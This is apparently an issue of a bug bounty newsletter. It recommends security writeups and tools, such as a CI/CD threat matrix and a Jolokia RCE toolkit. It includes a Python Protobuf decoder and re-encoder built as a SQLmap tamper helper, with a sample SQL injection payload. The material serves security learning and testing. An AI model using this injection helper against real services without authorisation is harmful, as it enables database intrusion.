Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources.
This issue covers the week from October 25 to November 1.
Our favorite 5 hacking items
1. Resource of the week
Common Threat Matrix for CI/CD Pipeline & Attacking and Securing CI/CD Pipeline
We’ve seen some amazing writeups involving CI/CD pipelines recently. Their attack surface is large, they are trendy, and they can lead to serious supply chain attacks, which makes them a good target for attackers.
So, if you want to learn about CI/CD security (from both a defender’s and an attacker’s standpoint), this new threat matrix by @rung is a great resource.
2. Writeup of the week
Tortellini in Brodobuf
While testing Web apps, you might encounter strings that look base64 encoded but decode to binary garbage: they are actually Protobuf serialized data wrapped in Base64. Not knowing about this serialization format can make you miss critical vulnerabilities, because the injectable fields are hidden inside the blob.
That’s what this writeup is all about: an excellent introduction to Protobuf, how to decode and deserialize Protobuf data without the original .proto schema, how to exploit this entry point for SQL injection, and how to create a SQLmap tamper script to automate the process.
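To make the “base64 that won’t decode” point concrete, here is an added example (not code from the Tortellini in Brodobuf writeup): a schema-less Protobuf wire-format decoder and encoder in plain Python, plus the rewrite step a tamper script performs on every request. The sample blob `CCoSBWFkbWlu` and the field layout (field 1 = a varint, field 2 = a string) are constructed for this example; in a real target you would read the field numbers off the decoded output and pick the one that reaches the SQL query.

```python
import base64

# Added example (not from the writeup): a schema-less Protobuf wire-format
# decoder/encoder, enough to spot a base64-wrapped Protobuf blob, read its
# fields, and rewrite one of them. Wire types per the Protobuf encoding spec:
# 0 varint, 1 fixed64, 2 length-delimited, 5 fixed32 (3/4 are deprecated groups).
VARINT, FIXED64, LENGTH_DELIMITED, FIXED32 = 0, 1, 2, 5


def _read_varint(buf: bytes, pos: int) -> tuple[int, int]:
    result, shift = 0, 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated varint")
        b = buf[pos]
        pos += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, pos
        shift += 7
        if shift > 63:
            raise ValueError("varint longer than 10 bytes")


def _write_varint(n: int) -> bytes:
    if n < 0:
        raise ValueError("negative ints need zigzag/sint encoding, not handled here")
    out = bytearray()
    while True:
        byte = n & 0x7F
        n >>= 7
        out.append(byte | 0x80 if n else byte)
        if not n:
            return bytes(out)


def decode_raw(buf: bytes) -> list[tuple[int, int, object]]:
    """Walk a message without a .proto: returns [(field_no, wire_type, value)].
    Varints come back as int, everything else as raw bytes (nested messages included)."""
    fields, pos = [], 0
    while pos < len(buf):
        key, pos = _read_varint(buf, pos)
        field_no, wire_type = key >> 3, key & 7
        if field_no == 0:
            raise ValueError("field number 0 is not valid Protobuf")
        if wire_type == VARINT:
            value, pos = _read_varint(buf, pos)
        elif wire_type in (FIXED64, FIXED32):
            width = 8 if wire_type == FIXED64 else 4
            if pos + width > len(buf):
                raise ValueError("truncated fixed-width field")
            value, pos = buf[pos:pos + width], pos + width
        elif wire_type == LENGTH_DELIMITED:
            length, pos = _read_varint(buf, pos)
            if pos + length > len(buf):
                raise ValueError("length-delimited field runs past end of message")
            value, pos = buf[pos:pos + length], pos + length
        else:
            raise ValueError(f"unsupported wire type {wire_type} in field {field_no}")
        fields.append((field_no, wire_type, value))
    return fields


def encode_raw(fields) -> bytes:
    """Inverse of decode_raw: re-serialise [(field_no, wire_type, value)] in order."""
    out = bytearray()
    for field_no, wire_type, value in fields:
        out += _write_varint((field_no << 3) | wire_type)
        if wire_type == VARINT:
            out += _write_varint(value)
        elif wire_type == LENGTH_DELIMITED:
            out += _write_varint(len(value)) + value
        else:  # fixed32/fixed64: raw bytes go back unchanged
            out += value
    return bytes(out)


def b64_to_fields(blob: str):
    """Base64-decode (standard or URL-safe alphabet, padding optional) and parse as Protobuf.
    Returns None when the bytes do not form a well-formed message."""
    raw = base64.urlsafe_b64decode(blob + "=" * (-len(blob) % 4))
    try:
        return decode_raw(raw)
    except ValueError:
        return None


def inject_into_field(blob: str, field_no: int, payload: str) -> str:
    """The per-request step of a tamper script: replace one string field with the
    payload, re-encode, and base64 the result, leaving all other fields untouched."""
    fields = b64_to_fields(blob)
    if fields is None:
        raise ValueError("input does not parse as Protobuf")
    rewritten = [
        (fn, LENGTH_DELIMITED, payload.encode()) if fn == field_no and wt == LENGTH_DELIMITED
        else (fn, wt, val)
        for fn, wt, val in fields
    ]
    return base64.b64encode(encode_raw(rewritten)).decode()


# Constructed sample: field 1 = varint 42, field 2 = string "admin".
# In a request it just looks like base64 of nine bytes of binary junk.
SAMPLE_B64 = "CCoSBWFkbWlu"

if __name__ == "__main__":
    print(b64_to_fields(SAMPLE_B64))             # [(1, 0, 42), (2, 2, b'admin')]
    print(inject_into_field(SAMPLE_B64, 2, "admin' OR 1=1-- "))
```

A successful parse is a hint, not proof: short random byte strings occasionally decode as a handful of plausible fields, so confirm by checking that the field numbers are small and the length-delimited values are readable strings or themselves parse as messages. For the SQLmap side, a tamper script is a module exposing `tamper(payload, **kwargs)` that returns the transformed payload; `inject_into_field` above is the body such a function would wrap, with the target field number fixed for the endpoint under test.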
3. Tools of the week
CookieMonster & Intro
jolokia-exploitation-toolkit (JET) & Tutorial
CookieMonster is a Go tool/API that automates testing stateless authentication cookies and tokens for vulnerabilities. It supports several frameworks and helped @iangcarroll find bugs in many large bug bounty programs.
If you want to automate your testing even further and mass-scan targets, @naglinagli suggests combining it with his Cookies-extractor.
@TheLaluka released Jolokia Exploitation Toolkit, a Python tool that helps exploit exposed Jolokia endpoints. The accompanying article goes into detail on how to use it to get RCE on a Tomcat/Catalina server. This is handy if you want to escalate an SSRF that can reach an internal Jolokia endpoint into RCE.
4. Tutorial of the week
Android security checklist: WebView
This is a great tutorial on how to attack and protect WebView on Android. It covers different exploitation techniques, ways to increase the impact of attacks, and lots of details.
5. Non technical items of the week
How to Start Bug Bounties 101 & How to Make a Million in 4 Years
Creativity, Self-Doubt & Doing Remarkable Work
If you wonder how hackers like @ozgur_bbh and @s0md3v do their magic, I recommend reading these articles they wrote.
The TL;DR is that there is no magic: “Just work.” It is still interesting to hear what they have to say on the topic, and which mindset and steps made all the difference for them.
Other amazing things we stumbled upon this week
Medium to advanced
Responsible(ish) disclosure writeups
Bug bounty writeups
See more writeups on the list of bug bounty writeups.
Misc. pentest & bug bounty resources
Bug bounty & Pentest news
- Bug bounty
- Upcoming events
- Tool updates